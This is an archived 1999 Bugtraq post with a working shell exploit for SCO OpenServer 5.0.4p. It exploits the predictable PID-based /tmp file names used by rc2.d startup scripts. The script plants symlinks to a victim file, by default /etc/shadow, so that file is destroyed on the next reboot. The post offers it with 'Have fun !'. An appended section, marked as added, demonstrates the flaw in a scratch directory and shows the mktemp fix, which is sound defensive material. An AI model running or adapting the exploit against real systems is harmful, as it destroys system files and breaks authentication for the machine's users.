[9827] in bugtraq
Little exploit for startup scripts (SCO 5.0.4p).
daemon@ATHENA.MIT.EDU (leshka)
Mon Mar 8 02:57:36 1999
Date: Sun, 7 Mar 1999 15:07:23 +0300
Reply-To: leshka <leshka@LESHKA.CHUVASHIA.SU>
From: leshka <leshka@LESHKA.CHUVASHIA.SU>
To: BUGTRAQ@NETSPACE.ORG
#!/bin/sh
#
# ... The punishment for disobedience ...
# (Cycle # 2)
#
# This simple script can help to erase any file
# (SCO OpenServer Enterprise System v 5.0.4p).
# Have fun !
#
#
#
#
# Some of the "/etc/rc2.d" startup scripts create and then delete temporary files
# with easily predictable names in the "/tmp" directory. Below are a few
# interesting fragments of those nice scripts:
#
# S84rpcinit:
# ...
# /bin/su root -c "/bin/ps -ef" > /tmp/rpc$$ 2>/tmp/rpc.err$$
# /bin/rm -f /tmp/rpc.err$$
# ...
# rm -rf /tmp/rpc$$
#
# S95nis:
# ...
# /bin/su root -c "/bin/ps -ef" > /tmp/nis$$ 2>/tmp/nis.err$$
# /bin/rm -f /tmp/nis.err$$
# ...
# rm -f /tmp/nis$$
#
# S85tcp:
# ...
# /bin/su root -c "/bin/ps -ef" > /tmp/tps$$ 2>/tmp/ps.err$$
# /bin/rm -f /tmp/ps.err$$
# ...
# /bin/rm -f /tmp/tps$$
#
# S89nfs:
# ...
# /bin/su root -c "/bin/ps -ef" > /tmp/nfs$$ 2>/tmp/nfs.err$$
# /bin/rm -f /tmp/nfs.err$$
# ...
# rm -f /tmp/nfs$$
#
# Every time during startup such shell scripts create files whose names
# include the process number of the shell script itself. My numerous tests
# showed that the number is always the same with every reboot. Pretty good,
# isn't it? One problem: how to determine the process number of such a script?
# It's so simple! Child processes of this script have PIDs with values
# slightly above the parent's PID. A little math and one gets it. The next
# step is creating a few symbolic links to the victim file in the "/tmp"
# directory. During the next startup the victim file will be destroyed.
#
# P.S. Looking forward to SCO publishing a complete list of the names
# of such perfect shell scripts.
#
# 999,99*2
#
# ----------------------
# ---------------------------------------------
# ----------------- Dedicated to my beautiful lady ------------------
# ---------------------------------------------
# ----------------------
#
# Leshka Zakharoff, 1999. E-mail: leshka@leshka.chuvashia.su (.ru)
#
#
#
if [ "_$1" = "_" ]
then
	echo -n "File to delete [/etc/shadow]:"
	read victim_file
	if [ "_$victim_file" = "_" ]
	then
		victim_file="/etc/shadow"
	fi
else
	victim_file=$1
fi
# PID of inetd, which is started by the S85tcp script; the script's own PID
# (and so the name of its /tmp/tps$$ file) lies a little below it.
pid=`/bin/ps -ef|/bin/grep -v awk|/usr/bin/awk '/inetd/ { printf $2 }'`
lastpid=`expr $pid - 30`
# Plant a link at every candidate name; the original hard-coded /etc/shadow
# here and ignored the file chosen above.
while [ $pid != $lastpid ]
do
	pid=`expr $pid - 1`; ln -fs "$victim_file" /tmp/tps$pid
done
echo Done ! File \"$victim_file\" will be destroyed after the next reboot.
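Added example, not part of the original post or of SCO's scripts: the defender's counterpart to the `/bin/ps -ef > /tmp/rpc$$` pattern quoted above. It reproduces the clobber inside a private scratch directory (the "victim" file, the planted link and the stand-in ps output are all constructed for the demo) and then shows the fix: let mktemp(1) choose the name and create the file with O_CREAT|O_EXCL, so a link waiting at a predictable path is never followed. A last helper shows the minimal pre-write check for scripts that cannot be changed to use mktemp.

```shell
#!/bin/sh
# Added defensive example; assumes a POSIX sh with mktemp(1).
# demo_root stands in for /tmp and is created fresh so nothing real is touched.
demo_root=$(mktemp -d) || exit 1

# Recreate a victim file with known contents (stands in for /etc/shadow).
reset_victim() {
    printf 'original contents\n' > "$demo_root/victim"
}

# Vulnerable pattern: the output name is predictable ($$-based), so a link
# planted at that name beforehand is followed by the redirection.
# Prints the victim's contents afterwards.
unsafe_capture() {
    reset_victim
    out="$demo_root/rpc$$"
    ln -fs "$demo_root/victim" "$out"      # pre-planted link (constructed)
    printf 'UID PID PPID ...\n' > "$out"   # stand-in for ps -ef output; follows the link
    rm -f "$out"                           # removes only the link; victim is already clobbered
    cat "$demo_root/victim"
}

# Safe pattern: mktemp picks an unpredictable name and creates the file
# exclusively, so anything already sitting at that path makes creation fail
# instead of being written through. Prints the victim's contents afterwards.
safe_capture() {
    reset_victim
    out=$(mktemp "$demo_root/rpc.XXXXXX") || return 1
    printf 'UID PID PPID ...\n' > "$out"
    rm -f "$out"
    cat "$demo_root/victim"
}

# Minimal check for scripts that must keep a fixed name: refuse to write if
# the path already exists as a symlink. Returns 0 if safe, 1 if a link is there.
# (Still racy between the test and the write; mktemp is the real fix.)
refuse_if_symlink() {
    if [ -L "$1" ]; then
        return 1
    fi
    return 0
}

cleanup() { rm -rf "$demo_root"; }
```

Run it and compare `unsafe_capture` (victim replaced by the ps output) with `safe_capture` (victim untouched); call `cleanup` at the end to remove the scratch directory.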